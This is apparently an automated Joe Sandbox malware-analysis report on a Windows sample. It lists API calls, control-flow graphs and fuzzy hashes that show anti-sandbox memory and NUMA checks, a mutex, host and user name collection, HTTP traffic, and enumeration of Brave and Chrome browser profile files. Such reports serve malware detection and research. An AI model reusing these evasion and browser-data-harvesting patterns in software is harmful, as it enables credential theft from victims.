                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                            • String ID:
                                            • API String ID: 3511611419-0
                                            • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                            • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                            • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                            • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                            Control-flow Graph

                                            APIs
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                            • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                            • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ??2@$CrackInternetlstrlen
                                            • String ID: <
                                            • API String ID: 1683549937-4251816714
                                            • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                            • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                            • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                            • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1494 401220-401247 call 4189b0 GlobalMemoryStatusEx 1497 401273-40127a 1494->1497 1498 401249-401271 call 41da00 * 2 1494->1498 1499 401281-401285 1497->1499 1498->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                            APIs
                                            • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                            • __aulldiv.LIBCMT ref: 00401258
                                            • __aulldiv.LIBCMT ref: 00401266
                                            • ExitProcess.KERNEL32 ref: 00401294
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                            • String ID: @
                                            • API String ID: 3404098578-2766056989
                                            • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                            • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                            • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1508 416af3 1509 416b0a 1508->1509 1511 416aba-416ad7 call 41aad0 OpenEventA 1509->1511 1512 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1509->1512 1517 416af5-416b04 CloseHandle Sleep 1511->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1511->1518 1517->1509 1518->1512
                                            APIs
                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0079D410,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                            • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                            • Sleep.KERNEL32(00001770), ref: 00416B04
                                            • CloseHandle.KERNEL32(?,00000000,?,0079D410,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                            • ExitProcess.KERNEL32 ref: 00416B22
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                            • String ID:
                                            • API String ID: 941982115-0
                                            • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                            • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                            • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                            • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                              • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,007CC908), ref: 00406303
                                              • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                              • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,007CC638,00000000,00000000,00400100,00000000), ref: 00406385
                                              • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                              • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                            • String ID: ERROR$ERROR
                                            • API String ID: 3287882509-2579291623
                                            • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                            • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                            • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                            • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                            • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocComputerNameProcess
                                            • String ID:
                                            • API String ID: 4203777966-0
                                            • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                            • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                            • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                            • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                            APIs
                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                            • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                            • ExitProcess.KERNEL32 ref: 00401143
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$AllocCurrentExitNumaVirtual
                                            • String ID:
                                            • API String ID: 1103761159-0
                                            • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                            • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                            • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                            • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0079F12E
                                            • Module32First.KERNEL32(00000000,00000224), ref: 0079F14E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280904911.000000000079E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079E000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_79e000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3833638111-0
                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction ID: 2e852acaffcd8cc2ff2c86bd92bf84ccf2d9a2b2b3cb411c9aab0a42c1b92eff
                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                            • Instruction Fuzzy Hash: 19F06231240714EBDB203AF9EC8DBAAB6E8AF89725F100538E642D10C0DA78E8454AA1
                                            APIs
                                            • SetErrorMode.KERNEL32(00000400,?,?,023E0223,?,?), ref: 023E0E19
                                            • SetErrorMode.KERNEL32(00000000,?,?,023E0223,?,?), ref: 023E0E1E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction ID: d4cb4eba94850209cbaae35e362045676c289cb241e5a03fcbaace5bfaab95b6
                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                            • Instruction Fuzzy Hash: 05D0123114512877DB003A94DC09BCD7B1CDF05B66F008021FB0DE9080C7B0954046E5
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                            • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                            • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                            • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                            APIs
                                              • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                              • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                              • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                              • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                              • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                              • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                            • ExitProcess.KERNEL32 ref: 004011C6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Process$AllocName$ComputerExitUser
                                            • String ID:
                                            • API String ID: 1004333139-0
                                            • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                            • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                            • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                            • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0079EE16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280904911.000000000079E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0079E000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_79e000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction ID: d9c5ba4c2d3817e1ed06dc1dd4d6d0b66d0120c435933573f2fca624f2723ccb
                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                            • Instruction Fuzzy Hash: 99113C79A00208EFDB01DF98C985E99BBF5AF08750F0580A4F9489B362D775EA50DF80
                                            APIs
                                            • wsprintfA.USER32 ref: 004138CC
                                            • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                            • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                            • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                            • API String ID: 1125553467-817767981
                                            • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                            • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                            • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                                            • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                              • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                                            • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                                            • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                                            • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                            • API String ID: 3334442632-726946144
                                            • Opcode ID: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                            • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                                            • Opcode Fuzzy Hash: 0a7976044a15c6e1a47e7bb651738ac5a93916ab5623d5d417d7de4c0f42f271
                                            • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                                            APIs
                                            • wsprintfA.USER32 ref: 0041492C
                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                            • StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                            • StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                            • FindClose.KERNEL32(000000FF), ref: 00414B92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextwsprintf
                                            • String ID: %s\%s$%s\%s$%s\*
                                            • API String ID: 180737720-445461498
                                            • Opcode ID: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                            • Instruction ID: f0ba0eb1991201f306808920aeaa9e90ed650eb79ad5a8a04d265ad4202cf965
                                            • Opcode Fuzzy Hash: dd01fc369b5388c5bfb31bfe2d46f2fde17b2a46eb7854bc19da0db36a1e72aa
                                            • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                            APIs
                                            • wsprintfA.USER32 ref: 023F3B33
                                            • FindFirstFileA.KERNEL32(?,?), ref: 023F3B4A
                                            • lstrcat.KERNEL32(?,?), ref: 023F3B9C
                                            • StrCmpCA.SHLWAPI(?,00420F70), ref: 023F3BAE
                                            • StrCmpCA.SHLWAPI(?,00420F74), ref: 023F3BC4
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023F3ECE
                                            • FindClose.KERNEL32(000000FF), ref: 023F3EE3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 1125553467-0
                                            • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                            • Instruction ID: 792bf8d3daa40e297c98f38320f30ec48c74d811ed3e5541cf69d2417e8e1d7c
                                            • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                            • Instruction Fuzzy Hash: C1A171B6A40258ABDB74DFA4DC84FEE737AFF49700F044588A60D96140EB749B84CF62
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                            • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                            • wsprintfA.USER32 ref: 004145A6
                                            • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                            • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                            • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                            • FindClose.KERNEL32(000000FF), ref: 004146A0
                                            • lstrcatA.KERNEL32(?,0079D5B0,?,00000104), ref: 004146C5
                                            • lstrcatA.KERNEL32(?,007CB9F8), ref: 004146D8
                                            • lstrlenA.KERNEL32(?), ref: 004146E5
                                            • lstrlenA.KERNEL32(?), ref: 004146F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                            • String ID: %s\%s$%s\*
                                            • API String ID: 13328894-2848263008
